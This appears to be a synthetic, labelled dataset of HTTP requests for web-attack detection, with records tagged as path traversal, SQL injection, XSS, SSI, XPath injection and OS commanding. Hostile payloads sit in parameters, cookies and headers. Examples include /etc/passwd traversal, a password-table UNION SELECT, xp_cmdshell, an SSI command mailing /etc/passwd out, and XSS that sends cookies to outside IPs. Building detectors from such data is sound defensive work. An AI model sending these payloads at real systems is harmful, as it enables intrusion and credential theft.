If-Unmodified-Since: Wed, 21 Feb 07 08:17:59 GMT
If-Match: *
If-None-Match: ".VThUXL4CcYVBfo3Zo"
If-Range: Mon, 15 Jan 07 17:35:39 UTC
Max-Forwards: 068
Pragma: meeoe='eoRtao8'
Range: 55330-08,72-9
Referer: /enmaz/spWese/pszi7ds/ajvo1.asmx
User-Agent: lti6i (t@0KOS40; wBXK8sv; nrtslQs; mCBscFIX)
UA-Color: color16
UA-Pixels: 106x0388
Via: HTTP/8.9 88.55.107.49, HTTP/7.6 237.47.27.168
Transfer-Encoding: identity
Upgrade: ocfh3/0.8, wds/5.3, eda/9.0, eSS/4.4, ikt/4.1
Warning: 398 www.erno.tiff:75 "uaihrtmhhjaneIbin" 
----: ----------------------------------------

ft=776056729&naoa= ?&rDqgCjmIAt=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html

End - Id: 46124
Start - Id: 44862
class: PathTransversal
GET /cZuRtvW/fM_p9UVdbWjEGvnT7GJa/tesad0ozrmnntf7Ee/1KIbvee/vYXl6562XlKC1/negYam8pOqEXI61LipBD/y30rK8cYOrmuo94ZJ.mspx?YGHOO4T=6448560&ncetbgbd72N=1183722&liiibjhm3nooefl=.%2F..%2F..%2F..%2F..%2F..%2F&rkou96e=es HTTP/1.1
Host: www.gnrtylq2d.st
Connection: 9iuLtme
Accept: */*;q=0.6
Accept-Charset: iso-8859-15, koi8, windows-1253, windows-1251;q=0.2, iso-10646-ucs-2;q=0.4
Accept-Encoding: compress, gzip, deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Tue, 16 Mar 10 22:37:37 GMT
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Wed, 25 Feb 09 05:14:43 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Apr 06 04:30:00 UTC
Max-Forwards: 4993
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: NTLM b2VlbmFvbmFoc2Vpb2tVY2REcTNyaWVlRGVpc3RtbHRh
Range: 3752-,303-8,-33345
Referer: http://suaec.biz/kr7ryem/ettnn6f/inmobz.php
TE: deflate,deflate,chunked
Trailer: Date
User-Agent: Mozilla/9.4 (compatible; giieaNi; WinNT; 4lmc5; oRhmwasse; idsiner4k)
UA-CPU: StrongARM
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 8.2 224.145.89.72, 4.4 www.hlijaAhh.htm, 5.1 247.212.47.152
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44862
Start - Id: 45276
class: PathTransversal
GET /OblQ/vJkX0K/recH/rnIn/-MgaOVTA.bin?xWktXandfNzphpwt=ijdl&emomtlt1=i6ohhdRfaa&e8heis7ydtp2n=3&24ietA8a=os&9lhoi=Tei3cmvro3leRaDtm&ynssnhie5bnmfan=ezr&trtddsljeahidln=et6oaletirOoservicesrE&utg=5839&e2=eot%7Ey&atseUm=aRiO HTTP/1.0
Host: 29.166.230.186
Connection: keep-alive
Accept: application/postscript;q=0.1
Accept-Charset: us-ascii;q=0.2
Accept-Encoding: identity, identity;q=0.5
Accept-Language: 31q9sks-u;q=0.0
Cache-Control: no-store
Client-ip: 85.39.168.130
Cookie: eYsRssnmIos=eVJZP
Cookie2: $Version="3"
Date: Thu, 05 Feb 04 07:11:27 CET
ETag: W/"5gSeKfsmgTjNx@2z-Qa"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Thu, 28 Jan 10 08:18:12 UTC
If-Unmodified-Since: Sun, 13 Nov 05 01:13:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Sep 04 17:20:51 CET
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: RQac if6voau=eekr
Range: 259-814,-6312
Referer: http://www.afoa.de/hnbefTn/tzleaHs/0spam0te/euhi.mspx
TE: gzip;q=0.2
Trailer: Host
User-Agent: ..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 0624x6647
Via: mrc0g/7.9 114.119.0.234
Transfer-Encoding: identity
Upgrade: hau3E/8.8, 3q3eqe/2.3, eaxe4/7.9
Warning: 494 255.48.101.36:36380 "e28hr" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45276
Start - Id: 35255
class: SqlInjection
GET /rxVxCN1MkHnY/yIzYhzaiselecti2Adoz/6eidlytriq/d5Uo5FREw2g./ieleye5er.html?etiyl=i_zy1OSZR7N7&oh4ageOe=bErrnhsetnf&ctk=%27%3B++++shutdown--&C5=linputa3nlSedn HTTP/1.1
Host: 202.39.226.176
Connection: oplAlhi
Accept: audio/*;q=0.7, video/*, image/jpeg;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: compress, deflate;q=0.9, compress
Accept-Language: draihtn-6fiegtal, oAdsrsh-Caiitg7;q=0.5, asye3-nie
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Sat, 19 Apr 08 21:37:23 UTC
ETag: "87HLJk6rTg0sgJKoxC"
Expect: 8nlRin
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Thu, 25 Sep 08 11:11:24 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 31 Dec 07 10:19:19 UTC
Max-Forwards: 77
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: NTLM dGVjYW9lM2FJZnRjYWhzZWVwaTNyZWdkZDR5YVR0NmFkaXI0b2JPc3NJYTI2bjF1
Range: 275-
Referer: http://www.pepit9tx.gov/usuNoi/on9aagdt/9bhmCyln/qsOao/yoAte.bin
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: chissaee (s6HnhR@; o3sBtD-Z)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: deflate
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 690 www.lipntex.shtml "aeisgIo7eETipoewea" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35255
Start - Id: 42074
class: SqlInjection
GET /L@eKEUsf80BaI/dBja/cCoG8i22EtNM4GhJ/kZM5BVQV-/0unRnooaSmnuO/DYYreplaceTO8sHxMl_Tb/1YW/racseCy/Nnolbmstas0ti/i1sei.shtml?WC5V=waAerwon&xcapt3bEdr9to=lAteeagetRer&nWqt6rd=kGLSkaA_L&st=oro&p1orje3uasveuo=o%5Csr%25iframeOleKbht&DTECtmp0pxsymf=%27union+select+PASSWORD+++from+DBA_PASSWORD%3B-- HTTP/1.1
Host: www.iaenuao5i.biz
Connection: ehitl
Accept: audio/x-wav;q=0.6, audio/*;q=0.0
Accept-Charset: euc-jp, big5, x-mac-greek;q=0.3, windows-1257, windows-1258;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: cqe59re-etrEo, orflet-te8;q=0.0, diaf-eslnld8W;q=0.5, n-isaCe;q=0.8
Cache-Control: no-transform
Client-ip: 79.156.167.12
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="76"
Date: Mon, 13 Mar 06 24:06:41 GMT
ETag: "1pNrCI08loZx0@fmb"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Tue, 16 Mar 04 03:30:05 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 0.9
Pragma: ehcpre='rreelpxe'
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Basic YTFmZm46bmhuaWti
Range: 54-40255,-926,-098
Referer: http://www.ttlydis.net/9yAye.txt
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Ci8eoiilmo
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: compress
Upgrade: zes4g/0.4, bti/7.1
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42074
Start - Id: 47990
class: XSS
GET /5oR@L/pN.insertWaSe/8Y/exDUMd.FvP4FpWI.dll?aealtote=895665717&ktmpa7bDjugcrU=R0o&NxDBIbbetweenpGn@=e&t2uO=%3Cdiv+++++style+%3D++++%22+++++behaviour%3A++url%28%5Bhttp%3A%2F%2Fwww.nema.com%2Fscript%2Fui.php%5D%29%3B%22+++%3E&szhioioEe=+Nss+Z92r&tEDtYfromZdww=Ynq&grttijtu1ma4e=tsn%29qadreO HTTP/1.0
Host: www.qutd2rr7aE.ch
Connection: alisP
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=20
Client-ip: 200.176.81.45
Cookie: yaZ2=connectn
Cookie2: $Version="01"
Date: Sun, 30 Sep 07 22:38:30 CET
ETag: W/"9VxvwsiJ2eaRQNV5OqF"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 26 Jan 10 13:17:37 CET
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Jun 09 04:52:23 GMT
Max-Forwards: 6058
MIME-Version: 1.7
Pragma: Raco='foinef'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Digest realm
Range: 2-,-873,110-95038
Referer: http://www.tIn1uhba.net/zadodst/tdeln.htm
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: iribt (e.64g-xIP; fd7D4qcx)
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 0.0 www.eoiaxnzR.shtml, 6.2 www.otTwn3.tiff
Transfer-Encoding: gzip
Upgrade: ram/6.4, IrrLes/3.6, aomon/6.0
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47990
Start - Id: 46584
class: XSS
GET /y.v34h@f-wVM/aXMo/cole2sfime5ieAg7s/hK.yEnnD/ODV2htaccesn.whereTVn8/anF6wWPVsLZ69o1h/7EsL8o76PeraKpk/ncQu.asp? HTTP/1.0
Host: 77.80.243.218
Connection: Oituua
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, gzip, deflate, compress;q=0.3, identity
Accept-Language: z-eria;q=0.1, 77owt6md-ajmecpS
Cache-Control: no-transform
Client-ip: 127.70.72.150
Cookie: 2em7h=n~?ocm5t)0drnewindow.openr;leO1oagbeettt=sUwNC;R5w5RP=idNd4ds;nbphtfsecszcne=9mRI7iatte
Cookie2: $Version="4"
Date: Sun, 20 Dec 09 21:03:45 UTC
ETag: "71Shv.49HXB8z5jdi2q"
Expect: 100-continue
From: h45nome@nksh.fr
If-Modified-Since: Sun, 28 Mar 10 11:03:36 CET
If-Unmodified-Since: Tue, 06 Apr 10 22:07:42 CET
If-Match: "jbmgCrf2DqGUagO"
If-None-Match: "ife@pSBAFKlG0xfGWPF"
If-Range: *
Max-Forwards: 37
MIME-Version: 6.4
Pragma: 7asceYsz=rniooj
Proxy-Authorization: Digest nonce
Authorization: pTnwR siFe=oigztm
Range: -786
Referer: /Fovt5S/EterKsa/iSh1co.pl
TE: gzip;q=0.2,gzip;q=0.1,gzip
Trailer: Expect
User-Agent: <img src= "   javascript:  [window.open('http://90.20.229.245/er.pl'+document.cookie);]"    >
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 991x9240
Via: FTP/7.0 www.tc3bnvy.htm, 0.7 250.202.235.159:79468
Transfer-Encoding: compress
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46584
Start - Id: 40220
class: SSI
PUT /NcLx9XTp/HWOvTHmZwindow.open1beZq.php4? HTTP/1.1
Content-Length: 253
Content-Language: Iafwtw,jDvpt,0
Content-Encoding: deflate
Content-Location: http://7itnse.fr/easrubZh/f1ho/dz7e/cohcw0ed/rynpua.tar.gz
Content-MD5: b3BoOHBPNm5kYW5lZWJnYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 23:52:36 UTC
Host: www.wwdt4asn.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: et2eZmdh-0afses3d;q=0.6, uf1m-sh6s5m, amd-2a
Cache-Control: min-fresh=3074
Cookie: etslibr=er etdinn?tmpincluden%A|vbscriptfhn;bttluef2tl3oLt3=p %rrlleitshutdownhEws9nt;2EH03=<!--   #exec   cmd="/bin/mail  ai.com     <   /etc/passwd"-->;xhabsOnbarol=?gden0)e
Date: Sat, 08 Aug 09 03:08:52 GMT
Expect: 100-continue
If-Modified-Since: Sun, 07 Mar 04 16:28:42 UTC
If-None-Match: *
Max-Forwards: 4266
Pragma: no-cache
Authorization: NTLM Z2hkaXZ3NHVhdG9kRXJsYWVleGlubExuOWhha2RPcnRvb3RoYWZ0eTI4YzFm
Range: 10-,9-
Referer: http://Laphhec.uk/aCaeeo/jRan/Y8eqr/xt0l.tiff
TE: trailers,gzip;q=0.7,deflate;q=0.0
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 5.6; rr-Om; rv:8.7.0) Gecko/20729253
UA-CPU: x86
Via: FTP/3.4 www.Kdtos.js, FTP/4.2 www.vldM.css
Transfer-Encoding: deflate
----: ---------------------------

h5dtrrrnhIn3G6=tzwFxVHMud&oNesh8iECt=144&mici=vnqRKEs&JK7H7zs=ewf$5woa$zt&o5t4=u&Bl=5 swdtaFssahNsc&wonngb=306&uOn=acnti&bin1j@includeQJI@6J=aHV&Ea8BytQMJdIu=39745&ffAnsOesqaeTr=5078&FLKSs=tuitcmde2n&eztas8f=5045988071&8xtbo2ttsmaedah=enWmidaeoilfsq

End - Id: 40220
Start - Id: 48169
class: XSS
GET /4wuCXp8fQfIPhCyrzu/tsago4qt7.htm?u3=82954023&aoscshneotoe6=r&hf=ed%29eio0re%3Eht%28ghomebdgt&agoebhiToped8tG=ebYepthtaccesuw&nw1hnewtdor=E+m&Ooe7e=%2Fpeae%40ihrdepxaio%7Exi&eurEtr3eur=4207864&_0yQLn.WNvNg=%5B+l&ae7duvheuod=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Bwindow.open%28%27http%3A%2F%2F108.57.212.63%2Ftrli.bin%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E HTTP/1.1
Host: 253.124.6.104
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: utf-7;q=0.9, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: rrmue-08xree, tl-O69ei, Lurwwmc-elhrnPde;q=0.5, Xh-lnrp, a6wrR3ei-au
Cache-Control: no-transform
Client-ip: 153.43.231.39
Date: Thu, 22 Sep 05 24:16:34 CET
ETag: W/"z-GNnMAzDnPnyqI"
Expect: 55chKo=sefit;EddLohi
If-Modified-Since: Thu, 24 May 07 04:07:58 UTC
If-Match: *
If-None-Match: "o3Ik5jtSWNwo763Gh3"
If-Range: "5q640iAGg0DteDRpzo5"
Max-Forwards: 2363
MIME-Version: 4.5
Pragma: no-cache
Authorization: NTLM YU5yeG9yaDRlbXJzZWFoZ25zYmFsbmVlbW5pMmR1d2VoYWFldw==
Range: 225-,-098229,-7852
Referer: /i5Fsexaa/1mece2rl/RGditnhb/o9fYmr0k.swf
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 2.0; ri-2A; rv:7.0.9) Gecko/21358907
X-Serial-Number: 4703078381671234299
----: ------------------

null

End - Id: 48169
Start - Id: 45182
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.pnjsbnne4n.biz:80
Connection: ssenevwp
Accept: */*;q=0.4
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: a-pnme, cyisdws9-ttowsdm;q=0.4, hhEh-iOTsee, i5rm-eaot;q=0.0, rsii-u;q=0.7
Cache-Control: max-stale
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 04 Apr 08 10:37:45 UTC
ETag: W/"qy__xjWofBRdE1OHoeF"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Wed, 31 Jan 07 19:10:19 GMT
If-Unmodified-Since: Fri, 12 Mar 10 24:31:20 UTC
If-Match: ".fuOe1z2d2KYDMm4xL@d"
If-None-Match: *
If-Range: *
Max-Forwards: 747
MIME-Version: 0.7
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: lu1l7 prUsP=IuiT
Range: 551-3881,-846
Referer: http://nbreikv.st/eevefny0/vtatene.jpeg
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.7 (compatible; Konqueror/9.7; Windows NT; tie1t)
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: 3.5 152.142.6.173, siqed6/4.1 169.175.109.189
Transfer-Encoding: identity
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45182
Start - Id: 40153
class: SSI
GET /jbrd2oahCReyqe/boot.iniKAQYa9Z/CReRdeleteI@v3pNzall/@VUft/vD@7/olQ/trIYniI/tY_1WRMayEbk5TEnc/uopxwoo/o1dctieie2oisjyt.asmx?rir=si9x41&bserMehmepeh=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l+++%2Fhome%2Fit%2Fio9%22++++--%3E&9meeli=oH5Bv_4pSyYD&liseat=raun HTTP/1.0
Host: www.sNbco.org
Connection: ur1oAut
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.65.44.55
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="247"
Date: Mon, 21 Sep 09 06:57:50 UTC
ETag: "qmJ@VE5bg4LWn_pk"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 2
MIME-Version: 5.9
Pragma: rc=o
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: teeta oybqtth=we3ig9Q
Range: 461-5609
Referer: /pc13.pl
TE: trailers,chunked
Trailer: Warning
User-Agent: tuttoe5e (ytppa0Fdu; rDWdoU5u; u7JjMQgMaf; scwL4n)
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: FTP/6.6 www.Emsrduee.gif
Transfer-Encoding: compress
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40153
Start - Id: 40983
class: SqlInjection
GET /6mm4OrOc7ut/asier1aNnnyoarptdyr/hLvD_b0q@QEea/bTin_ZDZDWfHpk/s2CncwnO7F3.sh?a4nhlTlcs3hgp=ef&1Rt=yHb9&tomebdsnUrgVn=S2&tsAhst=t%3Bl%28r%7E+&mI=hael&MspEtud=qfhvs&otse5=wa9spAnpassthru9aperl%27le-&fbd=nttv%24rbu+epo&tyliwenT1u4Fe=seYA4rtOaetek&syassch=stmp&rdeludyhia5s=fqrJub&nanwrriSeroo3fe=%7Es7%3A8&ridigsleeaaocto=eaen+%26tse HTTP/1.1
Host: 31.161.99.136
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-5, hz-gb-2312;q=0.3
Accept-Encoding: 
Accept-Language: hKfnte-St1z, wENry9en-sicsib, n8jibs-iAx5e0, Tstgadh-ae;q=0.2, ta5u-5es6
Cache-Control: max-age=0273
Client-ip: 63.118.232.21
Cookie: hidotEc2seecu2=01801;osrdphhD=exec   xp_cmdshell    '"Ie4itnab2" >>     script.vbs'
Cookie2: $Version="91"
Date: Fri, 21 Aug 09 22:16:02 UTC
ETag: W/"lU3MJD@VCbqxOg5S"
Expect: jlio=Bs1rhocw
From: rso1@lseLdehaua.biz
If-Modified-Since: Tue, 20 Jan 04 21:57:56 UTC
If-Unmodified-Since: Sun, 03 Jan 10 01:30:32 UTC
If-Match: *
If-None-Match: "VVlEfj0XAo6sO-zI"
If-Range: Thu, 21 Apr 05 21:04:21 CET
Max-Forwards: 333
MIME-Version: 5.3
Pragma: sPaiwhw=qa
Authorization: Digest opaque="anbi"
Range: 462-,-89,25-
Referer: http://kaoXyt.de/dAwd/7tvos/whiUid/sbje/tlon3.jpeg
TE: trailers,trailers
Trailer: Connection
User-Agent: aeTesrgu/7.3.3.0
UA-CPU: x86
UA-Disp: 8022,7411,8
UA-OS: Win95
UA-Color: color8
Via: FTP/4.3 www.edig.tiff:4, HTTP/8.7 92.10.66.78
Transfer-Encoding: compress
Upgrade: boi/5.8
Warning: 455 www.sliflg.jpg "eyfiunfe9Mutu" "Wed, 31 Jan 07 12:29:53 UTC"
X-Forwarded-For: 29.238.23.108
X-Serial-Number: 34472736
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40983
Start - Id: 48355
class: XPathInjection
GET /SZ/e3/mgP89p-9CejY2Y/i._/hO/eGV/i9ndot6htpeIaddok.shtml?p6raeHpc=txlaCa22cahoahiyu&NJhtvEf1gp=r&62tit=ealir%24&nlTa7oi=yr&styj4tuttfl=vt7hta5%26%27wshutdownoFo3&nmOtusceaKe8ehp=ge&nyt2etebeimem=a4d6ktlmimgl%2Br HTTP/1.1
Host: 60.89.143.123:005
Connection: heihrrMt
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew;q=0.2, euc-jp;q=0.1, iso-8859-3;q=0.7, x-mac-roman;q=0.2, ks_c_5601-1987
Accept-Encoding: identity;q=0.4, identity, gzip;q=0.9, compress;q=0.5, deflate;q=0.1
Accept-Language: teesre'] | P |   //user[   name/text(   )   =  'rmc
Cache-Control: wcmy1=ri
Client-ip: 107.146.131.163
Cookie: ameUzdw=4858391;ohnovh1lii=a5JSrr2bsai;lacsvnats9a6=50332;-dLZIimgJErL=haa;lh=854625035
Cookie2: $Version="0"
Date: Wed, 21 Apr 04 08:21:14 CET
ETag: W/"cSZIqXU9wKzZsf@"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Mon, 25 Dec 06 17:20:16 UTC
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "2MDIVp-vpmp3HPHnyD.p"
If-None-Match: "QEEZkRyz_Is0dopIOiI6"
If-Range: Sat, 12 Aug 06 11:15:18 GMT
Max-Forwards: 22
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: idn2 t3g6oh4=t46e
Range: -579124,02412-
Referer: http://www.Fans.st/eank2hto/edho/isan2tea/oetotie/4igw.pl
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: 4igg (aPf29Hr; eTAdCS_S; srbQUQb01w)
UA-Color: color32
UA-Pixels: 784x5970
Via: HTTP/9.6 www.bpfa.gif, 0.2 www.5irec.jpg, 9.1 www.NpeEl.html
Transfer-Encoding: deflate
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 17597605220
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48355
Start - Id: 42210
class: SqlInjection
GET /eenmosbannweeep4i/flMAj/is6JOlLlGJA3/OLL/eqmj/Jbt.fKye/ttoetoYe5k8w8mr/l0C/zq0Sb1OKjDYowfI/tms/imr2.php?ett=%27+++%29++UNION+ALL+++SELECT+++99%2C7%2C080%2C1%2C82++++FROM+Glq++WHERE+++%28+%27%27%3D+%27&l7=t9etght6chcmattia&rjkt4trcipa=hgeae%26Itaz9s4ed HTTP/1.0
Host: www.Emsss.net:34432
Connection: close
Accept: application/x-tar;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Espa-S, oeIs-igkemjte
Cache-Control: tcoTis='epp0oht'
Client-ip: 110.245.212.227
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="102"
Date: Mon, 26 May 08 23:01:03 GMT
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: Loobi=oDnd
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: "-AYkDfPTiqoR_X@7o"
If-None-Match: *
If-Range: Sat, 06 Sep 08 18:26:00 CET
Max-Forwards: 721
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: Digest nonce
Range: 8473-303,-227666,770360-
Referer: /dxseen/SRIwjvea/uePSj/aiaaptv/yarsdt.pl
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (Windows; U; Win98 3.7; la-qi; rv:6.2.7) Gecko/21145755
UA-CPU: StrongARM
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 2.8 9.251.32.190, HTTP/3.1 www.iekur.css, FTP/5.5 www.3hrm.htm:93798
Transfer-Encoding: gzip
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42210
Start - Id: 44285
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 1.160.33.91
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1252, x-mac-japanese
Accept-Encoding: 
Accept-Language: cmnieCt-oofsedo
Cache-Control: no-store
Client-ip: 136.184.250.5
Cookie: lEo2Ine7=rasc4;iylppgkepw=025898290;6sTiytjbonbre=4Jo9I0TJf5M;ilineertihRf=808888
Cookie2: $Version="75"
Date: Mon, 29 Oct 07 14:24:02 GMT
ETag: W/"Qb2QB@VsQ3Re-5VyzA"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Thu, 16 Sep 04 21:53:31 CET
If-Match: *
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: vahee otnsenso=4Odndyfc
